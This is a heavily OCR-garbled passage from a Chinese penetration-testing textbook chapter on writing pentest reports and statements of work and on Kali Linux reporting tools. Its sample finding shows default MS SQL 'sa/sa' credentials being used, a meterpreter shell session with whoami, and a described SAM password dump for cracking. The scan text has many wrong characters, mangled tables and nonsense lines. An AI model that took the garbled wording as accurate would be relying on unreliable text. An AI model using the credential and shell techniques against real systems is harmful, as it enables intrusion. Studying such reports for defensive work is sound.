验证 泼 洞 的 步 又 ,也 就 是 说 他 们 想 知 道 这 些 问 题 是 怎么 锌 发现、 被 访问 以 任 被 利用 的 。 这些 数 据 
还 能 证 明 在 工作 范围 中 所 有 标记 过 要 求 的 网 络 领 域 都 已 经 测试 过 了 。 


通常 测试 流程 应 该 包括 目标 检测 、 映 射 、 汤 洞 评估 、 染 构 分 析 、 汤 洞 利 用 和 报告 。 服 务 提供 
丙 就 某 项 工作 执行 到 什么 程度 取决 于 工作 说 明 书 中 定义 的 工作 重点 是 什么 。 


举 个 例子 。 


服务 提供 商 能 够 用 MS SQL 的 默认 系统 管理 员 登 录 凭 据 访 问 旧 有 的 EMR 主 机 。 这 种 访问 权限 
可 以 让 我 们 创建 管理 员 账 户 ， 查 看 系统 进程 、 用 户 账户 、 数 据 库 文件 ， 并 支持 文件 传送 和 执行 。 
拿 到 这 种 级 别 访问 权限 的 攻击 者 具备 中 断 依 赖 该 主机 的 所 有 业务 进程 的 能 


服务 提供 商 还 能 用 服务 器 消息 区 块 (SMB, Server Message Block ) 的 Null 用 户 账户 来 从 域名 
服务 器 (DNS, Domain Name Server ) 上 枚 举 用 户 账户 名 及 群 组 。 攻 击 者 可 以 用 这 些 信 息 来 对 客 
户 的 雇员 进行 有 针对 性 的 钓鱼 攻击 ， 或 是 进行 账户 密码 的 双 力 破解 攻击 。 成 功 获得 管理 员 登 录 和 赁 
据 的 攻击 者 可 以 创建 其 他 用 户 账户 , 然后 给 这 些 账户 分 配 目标 业务 角色 , 这 样 就 能 利用 用 户 群 组 
的 权限 完成 某 些 操作 。 


整体 来 看 , 找 出 的 对 系统 构成 威胁 的 结果 都 可 以 通过 简单 的 设备 或 软件 配置 设 定 加 上 文 持 政 


8.5 报告 格式 239 


OR Me SS o 


漏洞 评估 和 活 透 测试 总 结 : 


客户 回 服 务 提供 商 提 供 了 8 个 下 地 址 ,如 下 表 中 所 列 。 我 们 对 其 进行 了 以 下 范围 的 交口 扫 措 ， 
以 便 找 出 开放 的 端口 和 相关 主机 上 运行 的 服务 。 


IP 地 址 主机 名 TCP iim A 


42,53,88,135,139,445,464,53,636,1025,1071 
192.168.10.20 SERVO00I 1075,1145 


192.168.10.23 SERV542 "135,139,445,1433,3300 
192.168.10.154 SERV239 | 135,139,445,1433,3389 
192.168.10.204 SERV777 | 80,135,139,445,1443 


135,139,445,1433,1434,3372,3389,5022 

172.18.10.100 SERVSQL 123 8400,8402 
| 135,139.445,1433,1434,3372,3389,5022 

172.18.10.101 SERVSQL 124 8400,8402 


172.18.10.105 databaseintern.com [80,443 


8.5.8 ”调查 结果 总 结 


Joc GR Ee SE Ho TJ T vi o 这 部 分 通常 含有 对 服务 中 调查 结果 的 解释 , 包括 已 找到 的 
条 目 可 能 会 如 何 影 响 业 务 。 如 何 格 式 化 展示 这 些 结果 将 会 对 客户 的 反应 产生 决定 性 影响 , 所 以 不 
仅 要 知道 该 提 哪 些 内 容 ， 还 要 考虑 好 如 何 展示 这 部 分 数据 。 


最 佳 实践 吓 提供 一 个 风险 排名 来 带 助 客户 理解 如 何 针 对 找到 的 结 采 进行 啊 应 ,常见 的 排名 特 
征 包 括 可 能 性 、 风 险 评 优 、 图 表 、 色 彩 对 比 等 。 我 们 推荐 同时 提供 一 个 总 结 图 表 和 一 个 列 出 所 有 
调查 结 末 的 详细 部 分 。 要 支持 你 的 调查 结果 , 最 佳 实践 是 引用 公开 来 源 说 明 找 出 的 资产 为 什么 有 
问题 ,以 此 来 进一步 验证 总 结 。 公 开 来 源 可 以 是 违背 惯例 、 不 符合 强制 标准 或 是 来 自信 誉 度 较 局 
TF E SL Ae 3H] o 


ze BF o 


DO 危急 影响 关键 业务 流程 的 紧急 威胁 。 

O 高 危 影响 关键 业务 流程 的 非 下 接 威 胁 / 影 响 次 要 业务 流程 的 威胁 。 
O 危险 ”影响 业务 流程 的 非 直 接 / 部 分 危险 。 

口 RE 不 存在 下 接 威 胁 。 汤 洞 可 以 对 其 他 漏洞 产生 影响 。 


由 于 在 被 测 系统 中 发 现 的 最 高 风险 等 级 是 危急 , 所 以 被 测 系统 的 当前 风险 等 级 为 危急 . 具体 au 
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调查 结果 为 1 个 危急 漏洞 ，2 个 危险 漏洞 ，2 个 低 危 漏洞 ， 如 下 表 所 未 : 


[RA — — 0 0 0 0 0 0 [fe — O 
漏洞 D AR 


评估 调查 结果 总 结 表 


arr eee 
SS Se 
ee 
feed RB: 2) 
Mee |2 (去 重 后 :2) O 


“去 重 ” 是 指 找到 同一 风险 等 级 中 漏洞 后 其 中 不 同 漏 洞 的 数目 。 举 个 例子 ， 
如 果 我 们 找到 了 五 个 高 危 漏洞 ， 但 去 重 后 只 有 三 个 ， 有 些 漏洞 可 能 不 止 在 一 个 
系统 中 存在 。 


8.5.9 漏洞 


TESTER. ALIAS, DAS A REE Sait, EMAA sr Edi 35895 HE . Duk 
AVAS E RAS] EL Be BOY AT ETE S 报告 还 应 该 指出 漏洞 是 如 何 被 找 出 来 的 , 以 及 它 是 否 可 
iE, EME, win] Rx ee Het PACS AY Brel. CEFR TEC HY IRS ARA HP 
存在 的 源 洞 时 ,还 应 该 用 抓 取 的 流量 数据 制 成 一 张 图 表 ， DATE — AP Tne, RRR PY A 
验证 修复 方案 是 否 有 效 。 


在 交付 的 报告 中 ， 还 可 以 加 入 一 些 细 节 ， 有 具体 描述 已 发 现 的 漏洞 ， 如 下 所 列 : 


a sia 
口 对 业务 影响 的 严重 性 ; 
口 漏洞 描述 ; 
OQ 技术 细 市 ; 
口 受 影响 的 系统 ; 
口 受 影响 的 端口 ; 
O 建议 采取 的 行动 。 
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漏洞 名 称 在 微软 SQL 服务 器 上 使 用 默认 登录 凭据 
X125 $2189] 837 3 TE ros 
漏洞 描述 
跟 旧 有 的 EMR 数 据 库 关 联 的 微软 SQL 服务 大 可 以 通过 默认 的 登录 凭据 “sa/sa 访问。 攻击 
者 可 以 利用 这 些 SQL 登 录 邢 据 米 狭 得 对 碟 反 操作 系统 的 控制 。 这 种 访问 权限 包 后 上 上 传 和 下 
栽 文 件 、 在 主机 上 创建 / 读 取 / 写 入 /删除 文件 ， 以 及 创建 本 地 用 户 账户 


技术 细 市 
服务 提供 商 针 对 主机 100.25.5.55 执 行 了 漏洞 扫描 ， 并 发 现 MS SQL 系 统管 理 员 账户 (sa) 使 
用 的 仍然 是 默认 密码 (sa) 。 下 面 的 截图 显示 服务 提供 商 使 用 这 些 凭据 登录 到 了 服务 器 上 


imeterpreter > ipconfig 


VMware Accelerated AMD PCNet Adapter 
Hardware MAC: 2 m 2 

IP Address 

| Netmask 


服务 提供 商 继 续 转 储 了 SAM 数 据 中 的 内 容 。 这 个 数据 库 是 Windows NT 用 来 存储 和 提取 用 户 
怠 录 凭据 的 。 有 了 这 些 信息 ， 我 们 可 以 运行 “_ 个 彩 时 表 攻 击 或 区 力 破解 攻击 ， 米 将 所 有 这 
些 账户 的 密码 破译 出 来 。 如 果 这 些 密码 中 有 女 其 他 系统 相同 的 ， 我 们 研 可 以 跳 到 其 他 系统 
flee FPA EE AEE Jg OR aT BOTE PS. AR e Hg RA t eT EET 
并 一 个 目录 shell 


meterpreter > shell 

Process 7924 created 

Channel 1 created 

Microsoft Windows [Version 5.2 

iC) Copyrignt 1985-2003 Microsoft Cor D. 


C: \WINDOWS\ systemi: =whoami 
whoanl 


C: \WINDOWS\ system32>$ 


除了 说 明 系 统 存 在 的 漏洞 以 外 , 这 里 还 有 一 些 通用 调查 结果 , 你 可 能 需要 添加 到 要 交付 的 报 
告 中 ， 借 此 来 提升 报告 的 附加 值 。 举 个 例子 ， 所 有 美国 联邦 机 构 都 要 有 了 能够 文 持 IPv6 的 设备 是 个 
强制 要 求 。 虽然 没有 这 类 设备 不 算是 漏洞 , 不过， 美国 联邦 机 构 客 户 可 能 会 希望 知道 这 一 点 。 男 
一 个 例子 是 文 持 一 些 未 来 技术 ， 比 如 文 持 VoIP (Voice over IP ) 技术 和 视频 技术 。 

下 面 是 一 个 应 该 包含 到 渗透 测试 服务 中 提高 附加 值 的 调查 结果 的 推荐 列表 : 

口 设备 开机 和 运行 配置 的 差异 性 ; 

口 背离 最 佳 实践 ; 

OQ 对 IPV6 的 支持 ; 

a 停 售 或 寿命 已 终止 的 设备 ; 
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O 对 VoIP 和 视频 技术 文 持 的 能 

O 遵从 通用 标准 ， 如 FISMA PCI“; 

O 发 现 的 设备 序列 号 、 耻 地址、MAC 地 址 等 的 列表 ; 
O 网 络 拓扑 ; 

Q 可 用 的 协议 和 接 入 公 网 的 数据 。 


8.5.10 网络 考虑 的 因素 及 建议 


本 市 将 会 针对 在 服务 中 发 现 的 漏洞 提供 一 些 修复 建议 。 这 些 建议 既 包 括 整 体 建议 ,， 比如 “给 
系统 打 个 补丁 ， 也 包括 关闭 漏洞 的 一 些 详 细 步 又 。 有 些 修复 步骤 可 能 会 影响 其 他 服务 ， 比 如 天 
闭 端 口 来 防御 特定 类 型 的 攻击 , 这 可 能 会 影响 其 他 使 用 该 通道 进行 通讯 的 系统 。 此 外 ,还 有 一 些 
事情 也 很 重要 , 例如 , 提醒 客户 可 能 存在 的 负面 影响 , 建议 他 们 修复 漏洞 , 并 且 要 事先 告知 客户 ， 
即使 按照 修复 步骤 进行 操作 , 一 些 问题 也 无 法 百分之百 得 到 解决 , 一 些 系统 也 仍然 无 法 满足 特定 
的 规定 。 否 则 ,你 可 能 束 要 面 对 目 己 最 不 愿意 看 到 的 一 件 事 情 ， 那 就 是 服务 结束 后 ， 如 果 客 户 被 
攻击 了 ， 他 们 会 指责 你 没有 提供 正确 的 修复 步骤 来 修复 已 发 现 的 漏洞 。 


在 交付 报告 中 说 明 你 所 提供 的 服务 包含 哪些 保证 或 涵盖 哪些 内 容 ， 这 一 点 
非常 重要 。 因 为 ， 如 果 你 没有 说 明 自 己 提 供 的 服务 有 哪些 ， 也 没有 说 明 并 不 能 
GS 保证 一 定 符合 特定 标准 或 要 求 的 话 ， 当 客户 未 成 功 通 过 审计 时 ， 他 们 可 能 会 认 
S 为 这 是 由 于 你 前 面 的 服务 不 到 位 。 举 个 例子 ,在 服务 中 包含 一 份 PCI 报 告 ， 跟 实 
际 和 一 个 PCI 专 家 签约 来 审核 与 客户 网 络 相关 的 规定 的 方方面面 非常 不 同 。 后 者 

跟 审 计 人 员 采 取 的 方式 更 像 。 


修复 也 会 分 成 很 多 等 级 。 有 时 业务 架构 中 的 网 络 会 其 露 出 一 些 不 足 , BA UR E 3X, 
配置 上 没有 敌 盖 全 ,或 是 缺 一 个 补丁 。 建 议 中 应 包括 的 要 素 有 : 调查 结果 总 结 、 整 体 的 和 详细 的 
修复 建议 和 要 求 内 容 之 外 的 其 他 有 用 数据 一 一 如 支持 IPv6 的 能 力 、 网 络 设计 的 变化 、 对 人 硬件 、 软 
件 和 补丁 的 建议 ， 以 及 标准 吻合 度 总 结 。 


举 个 例子 。 


我 们 建议 客户 通过 订购 我 们 的 服务 来 积极 地 管理 技术 风险 和 网 络 安全 。 鉴 于 本 次 渗透 测试 
中 未 履 盖 的 地 方 对 整个 企业 的 影响 , 我 们 建议 客户 安排 合适 的 资源 来 保证 修复 工作 及 时 完成 。 尽 
管 给 出 要 部 署 的 服务 的 完整 列表 已 经 超出 了 本 次 合同 的 范围 , 我 们 还 是 要 指出 一 些 很 重要 的 整体 
建议 。 
O 实施 补丁 管理 项 目 ”许多 找 出 的 漏洞 都 可 以 通过 恰当 的 补丁 管理 来 避免 。 我 们 建议 你 在 
制定 恰当 的 补丁 管理 的 安全 策略 时 参考 NIST SP 800-408 中 列 出 的 指导 大 纲 。 这 能 降低 正 
在 运行 的 有 漏洞 系统 的 风险 。 
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O 加 强 对 横 跨 所 有 系统 的 变更 的 管控 ”常见 漏洞 都 是 人 为 造成 的 。 许 多 非 正 当 配 置 问题 都 
可 以 通过 所 有 活跃 系统 上 的 严格 的 变更 和 控制 流程 来 避免 。 

口 采用 多 个 因素 和 基于 角色 的 访问 控制 ”我 们 发 现 一 些 关 键 系统 将 密码 安全 作为 唯一 的 验 
证 授权 个 体 的 途径 。 最 佳 实践 是 至 少 有 两 种 形式 的 身份 认证 系统 ， 并 限制 管理 员 账 户 的 
访问 权限 。 

O 限制 对 关键 系统 的 访问 关键 系统 应 该 通过 白 名 单 、ACL、VLAN 或 其 他 方法 从 其 他 系统 
中 分 离 出 来 。 最 小 权限 系统 的 设计 理念 就 是 限制 攻击 者 通过 被 攻陷 的 资源 可 能 会 造成 的 
损失 总 额 。 你 可 以 查看 NIST SP 800-27 Rev Al1 来 了 解 符合 IT 系统 安全 基准 线 的 指导 大 纲 。 

O 将 漏洞 评估 常规 化 ”你 们 应 该 规律 性 地 进行 漏洞 评估 来 作为 验证 企业 当前 风险 状态 的 方 
法 。 你 可 以 参考 NIST SP 800-309 来 了 解 更 多 有 关 运 营 一 个 有 效 的 风险 管理 项 目的 指导 
原则 。 

口 包括 关键 系统 和 网 络 的 高 可 用 性 ”在 评估 过 程 中 ， 我 们 发 现 了 至 关 重 要 的 系统 上 出 现 了 
单 点 失败 。 最 佳 实践 是 准备 一 些 网 络 错误 事件 中 的 故障 恢复 备 选 方案 。 这 里 有 个 改进 过 
的 连接 到 核心 数据 中 心 的 流量 方案 的 例子 ， 我 们 为 数据 中 心 网 络 添加 了 宛 余 备份 系统 ， 
如 下 图 所 示 。 


额外 的 高 可 用 性 设备 


8.5.11 ”附录 

附录 中 要 列 出 所 有 跟 交 付 报 告 相 关 的 其 他 信息 , 通常 跟 主要 调查 结果 没 太 大 关系 。 这 部 分 内 
容 通 稼 是 用 作 参 考 ， 可 以 包含 扫描 的 结 有 末 、 抓 取 的 截图 和 其 他 信息 。 

示例 : 

附录 001 - Nessus 漏 洞 扫 描 报 告 


< 抓 取 的 Nessus 报 告 打印 件 > 
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8.5.12 WEK 


术语 表 用 于 定义 提案 中 术语 的 含义 。 术语 可 能 是 针对 技术 定义 、 指 出 所 参考 的 规范 的 术语 背 
后 的 需求 、 或 是 需要 进一步 说 明 的 其 他 领域 。 


8.6 工作 说 明 书 〈SOVWV) 


在 开始 进行 渗透 测试 之 前 ， 你 可 能 需要 编写 一 份 工作 说 明 书 ( SOW Statement of Work ), 
说 明 将 要 执行 的 工作 内 容 。 在 项 目 开始 之 前 , 你 和 利益 相关 者 需要 完成 的 第 一 件 事 情 通 稼 就 是 确 
定 工作 说 明 书 。 


在 编写 工作 说 明 书 时 , 我 们 建议 你 使 用 和 最 终 的 报告 结构 一 致 的 格式 。 工 作 说 明 书 的 基本 格 
式 包 括 如 下 内 容 。 


O 执行 报告 ”简要 摘 述 工作 内 容 、 工 作 目 标 以 及 针对 的 谈 者 。 
以 下 是 一 个 工作 说 明 书 的 执行 摘要 样 例 。 


服务 提供 商 很 蜗 兴 为 客户 介绍 我 们 进行 安全 评估 的 方法 。 客 户 发 起 这 项 工作 的 主要 目的 是 对 
组 织 内 当前 的 风险 度 进行 详细 评 佑 ， 引 在 制定 和 /或 实施 应 对 方案 ， 以 减少 严重 的 安全 问题 ， 最 
终 缓 解 相关 风险 。 


为 满足 客户 需求 , 服务 提供 商 提供 了 有 效 的 安全 评估 策略 , 这 一 策略 已 经 在 多 个 类 似 组 织 的 
安全 评估 中 使 用 , 效果 令 人 人 满意。 我们 将 首先 了 解 与 此 项 评估 相关 的 业务 需求 ， 接 寿 对 评 全 范围 
内 的 现 有 基础 设施 绘制 拓扑 结构 图 ， 收集 基线 数据 。 在 完成 对 基础 设施 的 考察 后 , 我们 将 对 核心 
系统 和 关键 网 络 设备 进行 系统 的 安全 漏洞 评 售 ， 以 发 现 可 能 被 利用 的 入 侵 载体 。 之 后 我 们 将 制定 
周密 的 利用 方法 ,经 审查 后 执行 ， 以 确定 此 前 发 现 的 漏洞 是 否 存 在 。 在 这 一 阶段 ,我 们 将 使 用 渗 
透 测 试 和 社会 工程 等 技术 。 最 后 ,在 此 次 工作 过 程 中 我 们 每 周 痢 将 举行 工作 进度 会 议 , 回顾 一 周 
THE, 确定 下 一 步 工作 的 主要 上 日 标 。 客户 可 以 通过 每 周 工作 进度 会 议 , 告知 我 们 的 工程 师 有 哪些 
正在 进行 的 系统 升级 需要 特别 予以 关注 。 服 务 提供 商 将 提供 可 笔 的 专业 项 目 管理 人 员 ， 以 确保 运 
营 质量 ， 提 供 恨 好 的 用 户 体验 。 


服务 提供 商 深 科 ， 要 保持 业务 稳定 ,组 织 的 安全 状况 需要 持续 评估 和 改进 。 我 们 相信 ， 此 次 
工作 将 使 系统 风险 降 至 最 低 , 将 业务 暂停 时 间 缩 至 最 得 ， 从 而 降低 运营 费用 ， 同 时 还 能 提供 数据 
保护 ， 提 升 客户 的 品牌 信誉 。 

此 外 ,安全 评估 的 结 琳 还 能 帮助 客户 进行 未 来 服务 的 规划 ,获得 更 好 的 业务 性 能 和 和 组 利 能 
安全 评 佑 市 来 的 这 些 益处 与 客户 的 目标 高 度 一 致 。 


Q 更 好 地 理解 客户 网 络 的 淤 在 安全 漏洞 和 风险 。 
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O 发 现 客户 基础 设施 中 存在 的 关键 的 安全 结构 弱点 。 

O 评估 客户 网 站 和 对 外 应 用 程序 的 安全 性 。 

口 活动 报告 ”所 有 执行 过 的 漏洞 利用 的 报告 ( 三 个 层级 )。 

O 主机 报告 ”详细 的 主机 信息 ， 包 括 侵入 的 计算 机 的 数量 、 每 台 计 算 机 上 利用 的 平均 漏洞 
数 和 每 台 计 算 机 上 发 现 漏洞 的 CVE 名 。 

Q 漏洞 报告 ”每 台 计 算 机 上 成 功利 用 的 漏洞 以 及 可 能 利用 的 漏洞 的 详细 报告 。 

口 各 户 疹 渗 透 测试 报告 ”每 个 客户 端 渗 透 测 试 的 完整 的 审计 跟踪 记录 ， 包 括 发 送 的 电子 邮 
件 模 板 、 采 取 的 漏洞 利用 、 测 试 结 有 末 〈 成 功 或 失败 ) 以 及 侵入 系统 的 详细 信息 。 

a 用 户 报告 ”客户 闪 测 斌 报告， 其 中 记录 点 击 了 哪些 链接 ， 点 击 时 间 以 及 点 击 者 。 


8.6.1 外 部 渗透 测试 


从 外 部 进行 渗透 测试 应 该 进行 特别 的 考虑 ,一 个 外 部 次 透 测试 工作 说 明 书 需要 指明 测试 攻击 
的 目标 ,攻击 中 可 能 使 用 的 步 又 ,还 要 定义 测试 何 时 停止 ， 或 者 哪些 情况 超出 了 测试 范围 。 换 言 
之 ,工作 说明书 定义 了 测试 的 范围 。 


下 一 段 是 外 部 渗透 测试 摘要 的 一 个 样 例 。 这 个 样 例 概 括 了 测试 流程 ,给 出 了 详细 的 执行 步骤 ， 
还 说 明了 客户 和 应 用 程序 所 有 者 的 职责 。 


外 部 Web 测 试 工作 说 明 书 样 例 : 


我 们 进行 外 部 Web 渗 透 测试 ， 主 要 目的 是 利用 网 络 边 界 、Web 域 以 及 Web 应 用 中 国有 的 安全 
弱点 。 相 关 的 应 用 ( 包括 后 台数 据 库 和 中 间 件 ) 也 属于 测试 的 范畴 , 也 会 进行 评估 。 在 这 一 阶段 ， 
我 们 主要 关注 的 是 与 缓存 溢出 、SQL 注 入 以 及 里 站 脚本 相关 的 第 见 汤 洞 。 我们 的 工程 师 也 会 以 手 
工 方 式 浏览 Web 域 ， 以 获取 其 他 敏感 信息 和 关键 数据 。 此 外 ， 应 客户 的 要 求 ， 此 次 渗透 测试 还 会 
对 DMZ 设 备 进行 测试 ， 笠 试 消除 Web 应 用 程序 域 的 逻辑 安全 防护 。 


具体 测试 流程 如 下 。 
服务 提供 商 将 对 Web 应 用 程序 域 完成 如 下 测试 流程 . 


O 根据 客户 的 网 站 信息 ， 确 认 待 测试 的 服务 絮 ， 同 时 抓 取 网 站 上 发 布 的 网 址 ; 
口 利用 主流 的 搜索 引擎 获取 指定 域 的 地 址 ; 
O 在 PGP 和 wHOIS 数 据 库 中 找到 地 址 ; 
口 同时 发 起 多 个 攻击 ， 以 加 速 渗透 测试 过 程 ; 
O 通过 安 疲 在 系统 内 存 中 的 离散 代理 ， 与 被 侵入 的 机 器 进行 交互 ; 
O 运行 本 地 攻击 ， 从 机 各 内 部 ( 而 非 通过 网 络 ) 进行 攻击 ; 
O 分 析 客 户 的 、 定 制 的 以 及 标准 的 Web 应 用 程序 ， 寻 找 安 全 弱点 ; 
验证 安全 漏洞 ; au 


a 使 用 动态 生成 的 攻击 , 模拟 一 个 攻击 者 , zB REIS NUTIESE BIG, 


246 第 8 章 ”渗透 测试 执行 报告 


a 使 用 命令 行 和 数据 库 控制 台 , 与 Web 服 务 侣 文件 系统 以 及 数据 库 进 行 交互 , 演示 攻击 造成 
的 后 末 ; 
Q 在 不 破坏 Web 应 用 程序 或 在 目标 机 带 上 运行 代码 的 情况 下 ， 执 行 闯 透 测试 。 


客户 职责 如 下 。 
口 确认 需要 进行 评 佑 的 Web 域 。 在 渗透 测试 期 间 告 知 用 户 服 务 进行 维护 以 及 /或 服务 受到 的 


E 
E tif] O 


O 如 宁 待 测试 的 Web 域 和 边界 设备 不 允许 公共 访问 ， 确 保 测 试 获得 访问 权限 。 


8.6.2 工作 说 明 书 附加 材料 


在 编写 工作 范围 说 明 时 , 你 还 应 该 考虑 其 他 一 些 方 面 。 我 们 推荐 你 在 工作 说 明 书 中 包含 如 下 
一 些 常见 内 容 O 


O 法 律 和 测试 免责 通 第 这 部 分 内 容 是 由 律师 预先 批准 的 标准 文字 ， 使 应 用 程序 所 有 者 放 
茎 追究 服务 提供 商 在 渗透 测试 中 造成 任何 损失 的 责任 。 

O 方法 和 手段 即 你 计划 如 何 执行 渗透 测试 (测试 规则 )， 客 户 如 何 获 知 项 目 进 度 和 时 间 
表 ， 以 及 客户 如 何 提供 测试 输入 。 下 面 的 图 表 提 供 了 一 个 工作 说 明 书 的 方法 样 例 。 


调查 和 发 现 


审计 和 评估 Do zaga 安全 苹 略 标准 整治 评估 和 教育 


和 最 佳 实践 


锁定 和 保护 
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O 收费 标准 ”工作 时 间 以 及 费用 。 这 部 分 内 容 可 以 按 项 目 阶段 细 分 ， 如 宁 预 期 时 间 可 能 超 
过 预计 价格 ， 应 该 在 文档 中 注释 说 明 。 

O 期 望 和 职责 在 项 目 生命 周 期 中 ， 服 务 提 供 商 和 客户 各 目的 任务 。 如 果 服 务 提 供 商 或 者 
客户 负责 的 步骤 是 项 目 未 来 阶段 的 先决 条 件 ， 应 该 在 文档 中 注释 说 明 。 

Q 资质 和 工具 ”客户 通常 会 审查 审计 人 员 的 资质 ， 以 及 用 于 完成 任务 的 工具 。 在 工作 说 明 
书 中 提供 这 些 信息 会 提高 你 的 可 信 度 和 专业 度 。 如 末 在 项 目 开 始 就 提供 了 可 能 用 到 的 工 
具 信 息 ， 那 么 在 项 目 过 程 中 如 采 因 为 工具 的 使 用 造成 负面 影响 ， 客 户 也 较 少 会 做 出 负面 
的 反应 。 


下 面 的 表格 样 例 不 仅 列 出 了 测试 中 将 使 用 的 工具 , 还 给 出 了 渗透 测试 人 员 的 专业 技能 和 证 书 : 


认证 和 证 书 测试 工具 
ISC2 信 息 系 统 安 全 认证 专家 (CISSP, ISC2 Certified Information Security Professional) Kali Linux 
际 电子 商务 顾问 (CEH, International Council of E-Commerce Consultants) Bactrack 5 RC3 
信息 系统 审计 与 控制 协会 (ISACA, Information Systems Audit and Control Association) AirSnort 
际 信息 系统 审计 师 (CISA，Certified Information Systems Auditor) AirCrack 
RSA 认 证 管理 器 8.0 (RSA Authentication Manager v8.0) Airsnarf 
RSA DLP 套件 认证 系统 工程 师 (CSE，RSA DLP Suite Certified Systems Engineer ) Airmagnet 
RSA SecurID Choice/Product Core Impact 
思科 认证 互联 网 专家 (CCIE-RS, Security, Voice, Storage, SP) Saint 
SAINT 认 证 工程 师 (SAINT Certified Engineers) Rapid 7 
Qualys 认 证 工程 师 (Qualys Certified Engineers ) Qualys 
思科 高 级 无 线 局 域 网 设计 专家 (Cisco Advanced Wireless Design Specialist) Metasploit 
PMI 项 目 管理 专家 (PMP) Plisade 
思科 高 级 安全 售后 专家 (Cisco Advanced Security Field Specialist) eEye Retina 
思科 高 级 无 线 局 域 网 售后 专家 (Cisco Advanced Wireless Field Specialist) Threat Guard 


思科 安全 大 师 专 业 伙 伴 (Cisco Master Security Specialized Partner) 


有 一 点 很 重要 : 你 应 该 及 时 解决 可 能 发 生 的 问题 。 我 们 的 同事 和 朋友 Willie 

Rademaker 有 一 名 名 言 :“ 要 把 事情 放 在 桌面 上 。” 也 就 是 说 , 在 定义 项 目 范围 时 ， 

"e 要 避免 意外 情况 。 如 果 你 觉得 有 什么 内 容 可 能 会 引起 争议 ， 就 要 立刻 解决 。 生 
日 可 以 充满 惊喜 ， 工 作 中 最 好 还 是 不 要 出 现任 何 计划 外 的 情况 。 


8.7 Kali 报表 工具 


Kali Linux 提 供 一 些 报表 工具 ， 可 以 对 团队 获取 的 信息 进行 组 织 ， 同 时 还 有 加 密 功能 。 接 下 
来 将 简单 介绍 几 个 能 帮助 你 更 好 进行 渗透 测试 的 工具 。 cu 
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8./.1 Dradis 


Dradis 是 一 个 用 于 信息 共享 的 开源 框架 。Dradis 提 供 一 个 集中 的 信息 存储 库 ， 跟 踪 记 录 完 成 
的 任务 和 未 完事 项 。Dradis 可 以 从 团队 成 员 处 收集 信息 ， 提 供 工 具 ( 例如: Nessus 和 Qualis )， 还 
可 以 导入 信息 ( 例如 漏洞 列表 )。 


要 使 用 Dradis， 你 可 以 打开 Reporting Tools > Documentation% , itféDradis. Dradisfé Hj 
标准 的 浏览 大 界面 ， 人 简化 了 各 种 用 户 的 合作 方式 。 要 开始 一 个 会 话 ， 你 可 以 选择 在 Meta-Server 
上 新 建 一 个 项 目 ( New Project )， 设 置 一 个 团队 成 员 共 享 使 用 的 密码 。 


Server password 


This server does not have a password yet, please set up one: 


Meta-Server 


You can create a new project or checkout one from the Meta-Server: 
New project @ 
Checkout project © 


要 登 和 系统， 你 需要 创建 一 个 用 户 名 并 设置 一 个 密码 。 登 人 系统 后 ， 你 就 进入 了 主 仪表 盘 。 
主 仪表 熏 提 贷 一 些 回 导 和 演示 视频 ， 带 助 你 了 解 如 何在 服务 中 使 用 Dradis。 


8.7.2 KeepNote 


KeepNote 是 一 个 用 来 记 笔 记 的 应 用 程序 。KeepNote 文 持 各 种 文本 和 图 像 格 式 ， 按 层次 组 织 
笔记 ,你 可 以 在 其 中 存储 各 种 类 型 的 笔记 ， 并 进行 快速 的 浏览 。 要 使 用 KeepNote， 你 可 以 打开 


Reporting Tools > Documentation3z&, i4#KeepNote. 


8.7.3 Maltego CaseFile 
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CaseFile 是 一 个 图 形 化 的 智能 应 用 程序 ， 用 于 判断 上 百 种 不 同类 型 的 信息 之 间 的 关系 和 真实 
世界 联系 。 在 调查 时 使 用 这 个 工具 ， 信 息 收 集 和 关系 分 析 工作 会 更 容易 。 


Maltego CaseFile Community 1.0.1 


$54 A AL 
% 01 d. 
nt 
zn HH ede N > ur 
= ÅS New Graph (1) * = 


Main View | Bubble View | Entity List | 


Gapo Dis Hanse Anthrax 
" a A » 


| GS Detail View 


| M oo 


| | | C Nuclear Weapo | 
= John Doe Hydrogen Bomb CEA makege NudaanWeapon 
met Uni c 5 Hydrogen 


8.7.4 MagicIree 


MagicTree 是 提高 渗透 测试 生产 力 的 工具 , 用 于 数据 整合 、 查 询 、 外 部 命令 执行 和 报表 生成 。 
在 MagicTree 中 ， 信 息 以 树 结 构 存 储 ， 很 容易 找到 之 前 测试 的 结 有 末 ， 用 于 生成 报表 。 


8.7.5 CutyCapt 


CutyCapt 可 以 捕 提 Webkit 的 Web 页 面 ， 存 储 为 各 种 点 阵 和 矢量 图 形 格 式 ， 例 如 SVG 、PDEF、 
PS、PNG、JPEG、TIFF、BMP 和 GIF。 


8.7.6 报告 样 例 
下 面 是 一 些 报 告 样 例 ， 你 可 以 以 此 为 模板 ， 为 你 自己 的 客户 生成 提交 文档 。 
服务 提供 商 向 客户 提交 的 渗透 测试 报告 。 
这 份 文档 包含 了 来 自 服务 提供 商 的 机 密 和 特许 信息 ， 这 些 信息 仅 供 客户 内 
、 ”部 使 用 。 如 果 你 接收 此 文档 ， 我 们 即 认为 你 同意 对 文档 内 容 保 密 ， 未 经 书面 请 
GS 求 和 服务 提供 商 的 书面 许可 ， 不 得 复制 、 技 露 或 散布 其 中 任何 内 容 。 如 果 你 不 


是 指定 的 收 件 人 ， 请 注意 : 任何 披露 、 复 制 或 散布 此 文档 内 容 的 行为 都 是 不 允 
许 的 。 
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& 
文档 : 渗透 测试 报告 
日 期 : 
密级 : 公开 
收 件 人 : 公司 、 姓 名 、 职 位 
文档 历史 : 

日 期 : 版 本 、 作 者、 注释 
1.0 草稿 

2.0 审阅 

目录 : 


1.3.2 Jail] B... 6 
Nt ujo——————— "— 7 
IDE S 8 
rc —————————— 10 
VEGAS NT 12 
ON  . ——————— 12 


2.1.1 A& HL. 12 
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EU c ————— 14 

2.2 Web 应 用 程序 漏洞 16 

qo — —————— 21 

VETERE TOT T 22 

执行 摘要 

1.1 摘要 

客户 委托 服务 提供 商 进 行 <domain> 的 季度 渗透 测试 。 

此 次 渗透 测试 于 <Date> 期 间 进行 ， 各 项 任务 以 及 测试 结果 的 详细 报告 内 容 如 下 所 述 。 


这 项 测试 的 日 的 是 发 现 位 于 工作 范围 内 的 服务 右上 运行 的 配置 和 Web 应 用 的 安全 汤 洞 。 测试 
模拟 攻击 者 或 恶意 用 户 的 行为 。 

1.1.1 方法 

O 大 范围 扫描 ， 寻 找 可 能 用 作 入 侵 点 的 服务 或 者 薄弱 区 域 。 

O 有 针对 性 的 扫描 和 调查 ， 验 证 大 范围 扫描 中 发 现 的 日 标 是 否 存 在 漏洞 。 

